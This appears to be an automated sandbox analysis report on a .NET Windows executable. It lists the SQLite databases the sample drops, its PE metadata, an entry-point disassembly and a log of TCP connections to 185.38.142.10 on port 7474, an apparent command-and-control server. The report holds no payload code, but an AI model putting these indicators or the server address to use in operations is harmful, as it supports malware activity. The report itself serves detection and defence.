                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):49152
                      Entropy (8bit):0.8180424350137764
                      Encrypted:false
                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                      MD5:349E6EB110E34A08924D92F6B334801D
                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):49152
                      Entropy (8bit):0.8180424350137764
                      Encrypted:false
                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                      MD5:349E6EB110E34A08924D92F6B334801D
                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):49152
                      Entropy (8bit):0.8180424350137764
                      Encrypted:false
                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                      MD5:349E6EB110E34A08924D92F6B334801D
                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):49152
                      Entropy (8bit):0.8180424350137764
                      Encrypted:false
                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                      MD5:349E6EB110E34A08924D92F6B334801D
                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):49152
                      Entropy (8bit):0.8180424350137764
                      Encrypted:false
                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                      MD5:349E6EB110E34A08924D92F6B334801D
                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):49152
                      Entropy (8bit):0.8180424350137764
                      Encrypted:false
                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                      MD5:349E6EB110E34A08924D92F6B334801D
                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):5.960462692653556
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      • Win32 Executable (generic) a (10002005/4) 49.75%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Windows Screen Saver (13104/52) 0.07%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      File name:a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      File size:97'792 bytes
                      MD5:6bd0efca19c8a21373008dd422aaf39b
                      SHA1:c81af8840eccf6a7b5354046ace6e1a4a77b487f
                      SHA256:6d62a0958a7574ba2ad7dce6199bbd1520afd23fea2183dc031b234e5fc66698
                      SHA512:6ffd237cd396f420bd4d7c7fe2fd74bc23b47c410f576c8c1cb57bd70a4285bece186318f7fa4b787eb077cf16c1b1d8cf4453a7d8977232d28160d82187857c
                      SSDEEP:1536:5qs+OqJGlbG6jejoigIj43Ywzi0Zb78ivombfexv0ujXyyed2GteulgS6p8l:XRuOYj+zi0ZbYe1g0ujyzd+8
                      TLSH:CAA35D20679C9F19EAFD1B74B4B2012043F1E08A9091FB4B4DC1A4E71FA7B865957EF2
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..t..........>.... ........@.. ....................................@................................
                      Icon Hash:90cececece8e8eb0
                      Entrypoint:0x41933e
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows cui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x192e40x57.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x4de.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1c0000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000x173440x17400664ef906a224ba081aad24641e7c0a44False0.44868321572580644data6.015496636174548IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc0x1a0000x4de0x600e3145af1e7dfa1e41fe7799ae002b612False0.3756510416666667data3.723940100220831IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x1c0000xc0x20089ebbf373068a00e5c68d2ac72a26374False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_VERSION0x1a0a00x254data0.4597315436241611
                      RT_MANIFEST0x1a2f40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                      DLLImport
                      mscoree.dll_CorExeMain
                      TimestampSource PortDest PortSource IPDest IP
                      Jun 28, 2024 12:01:52.698112965 CEST497317474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:01:52.702896118 CEST747449731185.38.142.10192.168.2.4
                      Jun 28, 2024 12:01:52.702980042 CEST497317474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:01:52.718724012 CEST497317474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:01:52.723453999 CEST747449731185.38.142.10192.168.2.4
                      Jun 28, 2024 12:01:53.070707083 CEST497317474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:01:53.075575113 CEST747449731185.38.142.10192.168.2.4
                      Jun 28, 2024 12:01:53.297841072 CEST747449731185.38.142.10192.168.2.4
                      Jun 28, 2024 12:01:53.351757050 CEST497317474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:01:53.424422979 CEST747449731185.38.142.10192.168.2.4
                      Jun 28, 2024 12:01:53.476727009 CEST497317474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:01:58.482003927 CEST497317474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:01:58.486931086 CEST747449731185.38.142.10192.168.2.4
                      Jun 28, 2024 12:01:58.652350903 CEST747449731185.38.142.10192.168.2.4
                      Jun 28, 2024 12:01:58.652734995 CEST497317474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:01:58.657519102 CEST747449731185.38.142.10192.168.2.4
                      Jun 28, 2024 12:01:59.468247890 CEST747449731185.38.142.10192.168.2.4
                      Jun 28, 2024 12:01:59.468266964 CEST747449731185.38.142.10192.168.2.4
                      Jun 28, 2024 12:01:59.468277931 CEST747449731185.38.142.10192.168.2.4
                      Jun 28, 2024 12:01:59.468291998 CEST747449731185.38.142.10192.168.2.4
                      Jun 28, 2024 12:01:59.468373060 CEST497317474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:01:59.468436003 CEST497317474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.061331987 CEST497317474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.061647892 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.066505909 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.066550970 CEST747449731185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.066582918 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.066613913 CEST497317474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.067217112 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.072098017 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.414602995 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.419686079 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.419725895 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.419759989 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.419776917 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.419787884 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.419806004 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.419816017 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.419816971 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.419842005 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.419843912 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.419871092 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.419876099 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.419892073 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.419903040 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.419923067 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.419930935 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.419945955 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.419959068 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.419975996 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.420005083 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.424932957 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.424961090 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.424989939 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.425004005 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.425040007 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.425067902 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.425067902 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.425095081 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.425134897 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.425153971 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.425174952 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.425275087 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.471574068 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.471681118 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.523525000 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.523622036 CEST497337474192.168.2.4185.38.142.10
                      Jun 28, 2024 12:02:03.539313078 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:03.539494991 CEST497337474192.168.2.4185.38.142.10
